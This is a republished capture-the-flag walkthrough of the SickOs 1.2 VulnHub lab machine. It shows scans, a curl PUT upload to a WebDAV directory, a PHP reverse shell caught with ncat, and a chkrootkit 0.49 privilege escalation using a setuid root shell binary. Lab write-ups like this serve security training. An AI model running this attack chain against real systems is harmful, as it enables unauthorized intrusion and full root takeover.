SickOs 1.2 Walkthrough

Datetime:2017-02-03 06:57:31         Topic: Lighttpd          Share        Original >>
Here to See The Original Article!!!

You can find SickOs here .

Quick run-down:

  1. Service enumeration
  2. Check for any vulnerabilities
  3. Escalate to Root
  4. Get our flag ��

Exploit used:

  1. Chkrootkit 0.49

After seeing what is on my net, I began to do an Nmap scan on my target to see what kind of services are running. I see port 80 open so I head to the webpage to see what it has in store for me.

root@ch3rn0byl:~# nmap -A -p-
StartingNmap 7.12 ( ) at 2016-04-29 01:54 EDT
Hostis up (0.00046s latency).
Not shown: 65533 filteredports
22/tcpopen  ssh    OpenSSH 5.9p1 Debian 5ubuntu1.8 (UbuntuLinux; protocol 2.0)
| ssh-hostkey: 
|  1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|  2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcpopen  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Sitedoesn't have a title (text/html).
MACAddress: 00:0C:29:16:EB:35 (VMware)
Warning: OSScanresultsmaybeunreliablebecausewecouldnot findatleast 1 openand 1 closedport
Devicetype: generalpurpose
Running: Linux 3.X|4.X
OSCPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OSdetails: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4
NetworkDistance: 1 hop
ServiceInfo: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1  0.47 ms
OSand Servicedetectionperformed. Pleasereportanyincorrectresultsat .
Nmapdone: 1 IPaddress (1 hostup) scannedin 113.70 seconds

I was greeted with a meme. As a side note, this is how my resting face looks like ��

Inspecting the page source didn’t really reveal anything too obvious to me, so I had downloaded the image to see if anything was maybe inside the image. No fruit.

As I was poking around, I decided to run a dirb scan on the page to see if anything fruitful would come out of it. A few seconds later, I had learned there is a “/test/” directory. Su-WEET! I also ran a Nikto scan to see if anything would come out of that. Nikto had brought nothing to me, but that is definitely a-okay.

root@ch3rn0byl:~# dirb /usr/share/wordlists/dirb/common.txt
START_TIME: FriApr 29 05:20:45 2016
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
GENERATEDWORDS: 4612                                                          
---- ScanningURL: ----
+ (CODE:200|SIZE:163)                                                              
==> DIRECTORY:                                                                        
---- Enteringdirectory: ----
(!) WARNING: DirectoryIS LISTABLE. Noneedto scanit.                        
    (Use mode '-w' if youwantto scanitanyway)
END_TIME: FriApr 29 05:20:47 2016

Let’s take a look at what is in /test/

Here is where it took me a little while. I was searching Exploit-DB for lighttpd and Google for lighttpd 1.4.28 exploits. There were some older vulnerabilities, but not any for the version I was looking at. Banged my head a few times to see if maybe I had missed something so simple? BUT I WAS FINDING NOTHING.

I looked in the page source and that had nothing as well. How fun. I decided to see what happens if maybe I can do a GET request using Netcat. The beauty of using that was after entering the request, it would hang. Grrrrrr…

Next thing I did was fire up Burpsuite and see if at least THAT would capture something. Indeed it did, however it was nothing too crazy or out of the norm. Also, I wanted to try more requests and not just watch them. What else can do requests?? I turned to cURL and read the help.

Finally!! I grabbed something interesting using cURL. The awesome thing was I was able to specify what type of request I wanted to make.

root@ch3rn0byl:~# curl -X OPTIONS -v
*  Trying
* Connectedto ( port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host:
> User-Agent: curl/7.47.0
> Accept: */*
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Content-Length: 0
< Date: Fri, 29 Apr 2016 09:41:19 GMT
< Server: lighttpd/1.4.28
* Connection #0 to host left intact

I immediately noticed “PUT”. So I uploaded a test file to see if it would work. It didn’t upload at first, so I tried uploading it using “HTTP/1.0”.  That worked with great success ��

root@ch3rn0byl:~# curl --upload-file test.txt -v --url -0 --http1.0
*  Trying
* Connectedto ( port 80 (#0)
> PUT /test/test.txtHTTP/1.0
> Host:
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5
* Wearecompletelyuploadedand fine
* HTTP 1.0, assumecloseafterbody
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Fri, 29 Apr 2016 09:45:42 GMT
< Server: lighttpd/1.4.28
* Closingconnection 0

What next you may ask?? Well…let me tell you! I turned to my handy-dandy php-reverse-shell. Using the default port number wouldn’t work so I changed it to port 443. I set up my listener, went to my shell, and voila! I caught shell!

root@ch3rn0byl:~# ncat -nlvp 443
Ncat: Version 7.12 ( )
Ncat: Listeningon :::443
Ncat: Listeningon
Ncat: Connectionfrom
Ncat: Connectionfrom
Linuxubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
 02:55:29 up  4:36,  0 users,  loadaverage: 0.03, 0.07, 0.05
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty ; pty.spawn("/bin/bash")'

So after doing enumeration on the machine, we can see that there is a “chkrootkit” inside cron.daily. The interesting thing about this is that it’s version 0.49. According to Exploit-DB , if you place a file called “update” in /tmp, chkrootkit will run it with root privileges. Very nice.

Sooo…let’s escalate our privs!

First thing I did was create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. After this, I take advantage of update to set root ownership of this simple, yet deadly binary that will allow me to run it >:D

If all goes well, I will now have a simple tool of mass destruction waiting for me in /tmp.

www-data@ubuntu:/tmp$ cat << EOF > root.c
cat << EOF > root.c
> int main(void) 
> { 
> setgid(0); 
> setuid(0); 
> execl("/bin/sh", "sh", 0); 
> }
www-data@ubuntu:/tmp$ gccroot.c -o rootme
www-data@ubuntu:/tmp$ cat << EOF > update
cat << EOF > update
> #!/bin/bash
> chownroot /tmp/rootme
> chgrproot /tmp/rootme
> chmod u+s /tmp/rootme
www-data@ubuntu:/tmp$ chmod +x update

Now, after waiting a minute or so…it’s time to check!

www-data@ubuntu:/tmp$ ls -al
ls -al
total 36
-rwsrwxrwx  1 root    root    7235 Apr 29 05:16 rootme

Great success!!

All there is to do now is navigate to root folder and retrieve our flag!!

root@ubuntu:/root# cat *.txt
WoW! If youareviewingthis, Youhave "Sucessfully!!" completedSickOs1.2, thechallengeis morefocusedoneliminationoftoolin realscenarioswheretoolscanbeblockedduringanassesmentand therebyfoolingtester(s), gatheringmoreinformationaboutthetargetusingdifferentmethods, thoughwhile developingmanyofthetoolswerelimited/completelyblocked, to get a feelofOldSchooland testingitmanually.
Thanksfor givingthis try.
@vulnhub: Thanksfor hostingthis UP!.

This was an awesome, frustrating, and amazing VM brought to you by D4rk! Thanks man!! That was a great one and I hope to see more coming!